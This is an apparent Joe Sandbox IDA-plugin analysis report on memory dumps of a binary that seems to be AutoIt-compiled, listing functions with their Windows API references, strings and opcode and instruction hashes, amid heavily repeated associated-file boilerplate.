Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: db840527555040a938f8c99f2b79ac2fddba5c900f9da4b4d26a6294eabe1316
Instruction ID: 216b0e4c742bd0679921916ec2fb52f46659220f21795d0e6de77c7770d634f0
Opcode Fuzzy Hash: db840527555040a938f8c99f2b79ac2fddba5c900f9da4b4d26a6294eabe1316
Instruction Fuzzy Hash: E8513375204666DFDF16DF28D8C8AFA7BA4EF19310F144059EC929B2A0D73C9C46CBA0

Function 00753297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007533D7
_memmove.LIBCMT ref: 00753470
_free.LIBCMT ref: 00753496
_memmove.LIBCMT ref: 00753549

Strings

Oau, xrefs: 00753482

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove$_free
String ID: Oau
API String ID: 2620147621-3624848570
Opcode ID: b477938c865ad21c675321db0468187237ebc32dd12636cecd55a11d15142a86
Instruction ID: 7ec38b22f495be9472dc5332e11390965afbc06cea0b5c402b2fe897afd9c5e6
Opcode Fuzzy Hash: b477938c865ad21c675321db0468187237ebc32dd12636cecd55a11d15142a86
Instruction Fuzzy Hash: EF517B716083419FDB24CF28C440A6BBBE1FF85354F54492DE98A87361EB79D905CB82

Function 007562F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007563A8
_memmove.LIBCMT ref: 00756446
_memset.LIBCMT ref: 0075646A

Strings

ERCP, xrefs: 00756313

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 507ae22a5e5cca032574becbd078e424fb08f6ad46b5f4d8ee911edbfb7d48b6
Instruction ID: 510f37b9be717361fc15e4136e893b47fffb954a0b842305642f5219383b9aea
Opcode Fuzzy Hash: 507ae22a5e5cca032574becbd078e424fb08f6ad46b5f4d8ee911edbfb7d48b6
Instruction Fuzzy Hash: B751C671900749DFDB24CF55C8857EABBF4EF04315F50856EEA4AC7240E7799698CB40

Function 007C7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007C76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007C76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 007C7708

Strings

SysMonthCal32, xrefs: 007C769B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ff23f6bc59ef6a3b566bb972dce3b11ba4175e5ac5e7f2dcbb88a75cd341545d
Instruction ID: e8dd879228fe6cb8c8d765b3c63c62a044b0531440ec6cbfa7d4183b08a922f3
Opcode Fuzzy Hash: ff23f6bc59ef6a3b566bb972dce3b11ba4175e5ac5e7f2dcbb88a75cd341545d
Instruction Fuzzy Hash: D2219F32600219ABDF159E64CC46FEA3B69EB48714F110218FE157B1D0DAB9A850DBA0

Function 007C6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C6FDF

Strings

Listbox, xrefs: 007C6F77

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 939d40a10e044723ef9eebeaf92ef94f093ee9caece06fc5a8a2183f34cd0fa0
Instruction ID: f0090b3140f1b48f3345395d8166a75e0c52175ab2eaf69d0094283276ef820b
Opcode Fuzzy Hash: 939d40a10e044723ef9eebeaf92ef94f093ee9caece06fc5a8a2183f34cd0fa0
Instruction Fuzzy Hash: 54219F32610118BFDF119F54DC85FBB3BAAEF89764F01812CFA549B190CA79AC518BA0

Function 007C797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007C79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007C79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007C7A03

Strings

msctls_trackbar32, xrefs: 007C79B8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7ecb6e80b527c4bedd80a7f3c43268278c04a9d8154258f6d9cf4efa733165c2
Instruction ID: 91a44f43a87c23cc906122117338ce813e8b1b675abaf0045dafc7461fab3725
Opcode Fuzzy Hash: 7ecb6e80b527c4bedd80a7f3c43268278c04a9d8154258f6d9cf4efa733165c2
Instruction Fuzzy Hash: E011E372244208BBEF189F75CC05FEB77A9EF89B64F01451DFA41A6090D675A851CB60

Function 00744C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744C2E), ref: 00744CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00744CB5

Strings

kernel32.dll, xrefs: 00744C9E
GetNativeSystemInfo, xrefs: 00744CAF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
Instruction ID: 4996385eebc989d7d1d78729295fdf70bdb3a99d51acb9635df3823c211c2434
Opcode Fuzzy Hash: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
Instruction Fuzzy Hash: A4D017B0511727CFE7209F31EA58F16B7E7AF05791B19C83ED886DA150E778D880CA60

Function 00744D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744D2E,?,00744F4F,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00744D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00744D7B
kernel32.dll, xrefs: 00744D6A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: d2f60140603cade18c8778cc0de3367fbf9be473bb382fc0574effee55835dd9
Instruction ID: 2f4c65c5d36f91ac087eaedf567ebff79be30a7f94a7636f1c59df61a15fb26d
Opcode Fuzzy Hash: d2f60140603cade18c8778cc0de3367fbf9be473bb382fc0574effee55835dd9
Instruction Fuzzy Hash: C8D017B0A10717CFD7209F31D808B16B7EAAF15352B15C83ED596D6250EB78D880CE54

Function 00744D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744CE1,?), ref: 00744DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00744DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00744DAE
kernel32.dll, xrefs: 00744D9D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: d8bae74ba40cb2cda468f45feeb53efa1afd68fc7b453eafe78599fedd55441a
Instruction ID: 626778c388b10a37277df8e8c2a13d52d9568afa2ea37447a4aad7e965827f99
Opcode Fuzzy Hash: d8bae74ba40cb2cda468f45feeb53efa1afd68fc7b453eafe78599fedd55441a
Instruction Fuzzy Hash: BFD0C7B0A00713DFC7208F30C808B56B3E6AF04340B04C83ED8C2C2250EB78C880CA10

Function 007C1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007C12C1), ref: 007C1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C1092

Strings

RegDeleteKeyExW, xrefs: 007C108C
advapi32.dll, xrefs: 007C107B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: e5689d799ae55db5c772b29b18b2b923f88dc386b7bd6e27a495ba7f06411ce1
Instruction ID: fe321caba99a13c8bca0762d2c5223b56ca4eaceaa5df9af03cdba0241d11aa8
Opcode Fuzzy Hash: e5689d799ae55db5c772b29b18b2b923f88dc386b7bd6e27a495ba7f06411ce1
Instruction Fuzzy Hash: BCD01770520716CFD7209F35D818E2A77E5AF06361F19CC3EE48ADA250E778C8C0CA50

Function 007B93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,007B9009,?,007CF910), ref: 007B9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B9415

Strings

GetModuleHandleExW, xrefs: 007B940F
kernel32.dll, xrefs: 007B93FE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 5359215b716006e789c20fc73db7b616e1b3666b8e60cde9b3f5860f762d20ce
Instruction ID: beec7bfb8affb872f82c61935cc3b2b7baaf12bf0bfc15d6cf64d590c2a93e85
Opcode Fuzzy Hash: 5359215b716006e789c20fc73db7b616e1b3666b8e60cde9b3f5860f762d20ce
Instruction Fuzzy Hash: 52D0C7B050072BCFCB208F30CA08A43BBE6AF00341B24C83EE696C2650E778C880CA20

Function 00781B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00781B42
__swprintf.LIBCMT ref: 00781B73

Strings

%.3d, xrefs: 00781B4D
WIN_XPe, xrefs: 00781BB2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 67245ae0f87aadc3d8880929b89440c6a10b0030b14bde8068e5b5fa4911bf62
Instruction ID: 124924daae4f1e5651bfcbe63e784703d60acaa3a39b0db425e0b8bd0bf01a35
Opcode Fuzzy Hash: 67245ae0f87aadc3d8880929b89440c6a10b0030b14bde8068e5b5fa4911bf62
Instruction Fuzzy Hash: F4D012F1844118EACB45AA908C44CF97B7CB704301F9005D2F90692000F33C9B86DB25

Function 007976C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
Instruction ID: 0676dfc078d91c97339957048420849136d45924e113ee58cca9eb0a7624b4c0
Opcode Fuzzy Hash: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
Instruction Fuzzy Hash: 82C17D74A14216EFCF18CFA8D884EAEB7B5FF48714B118598E805EB251D734EE81DB90

Function 007BE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 007BE3D2
CharLowerBuffW.USER32(?,?), ref: 007BE415

Part of subcall function 007BDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007BE615
_memmove.LIBCMT ref: 007BE628

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: f231e996e9e156ca12c405c25939735b948a3b742daaed21ada44fdcea3ace85
Instruction ID: 43a8499c57541343d1cd2e79a46bd2c9f4daf03074f50010545482882345b3cf
Opcode Fuzzy Hash: f231e996e9e156ca12c405c25939735b948a3b742daaed21ada44fdcea3ace85
Instruction Fuzzy Hash: 5BC15A71608301DFC714DF28C484AAABBE4FF89318F14896DF89A9B351D739E945CB82

Function 007B83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007B83D8
CoUninitialize.OLE32 ref: 007B83E3

Part of subcall function 0079DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0079DAC5

VariantInit.OLEAUT32(?), ref: 007B83EE
VariantClear.OLEAUT32(?), ref: 007B86BF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: fd9736c400b4c6520fa637f05965f616a5d0065658bc63f1a4a9ca1dd26c4709
Instruction ID: 180cf97192cebc67cb08651267987d26e807fe6d8bf29bdb1cad9ec960f77366
Opcode Fuzzy Hash: fd9736c400b4c6520fa637f05965f616a5d0065658bc63f1a4a9ca1dd26c4709
Instruction Fuzzy Hash: 22A11775204701DFCB50DF24C889B5AB7E9BF89314F148449FA9A9B3A2CB38ED04CB56

Function 00796DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00796E04
SysAllocString.OLEAUT32(00000000), ref: 00796EAD
VariantCopy.OLEAUT32 ref: 00796EDC
VariantClear.OLEAUT32(?), ref: 00796F03

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 0a7758182aad1ba238ca15d1d92f52f75f91d4a582b602b19f787dabd0c13ff9
Instruction ID: 1ec985bd3566e0afe4e0fa437ffaa3fbe783625fdbfd76c8eecdada399718c70
Opcode Fuzzy Hash: 0a7758182aad1ba238ca15d1d92f52f75f91d4a582b602b19f787dabd0c13ff9
Instruction Fuzzy Hash: 5551B870614301DADF28AF69F895A7AB3E5AF48310F24881FF556CB291EB7C9840DB15

Function 007C9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0168E838,?), ref: 007C9AD2
ScreenToClient.USER32(00000002,00000002), ref: 007C9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007C9B72

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
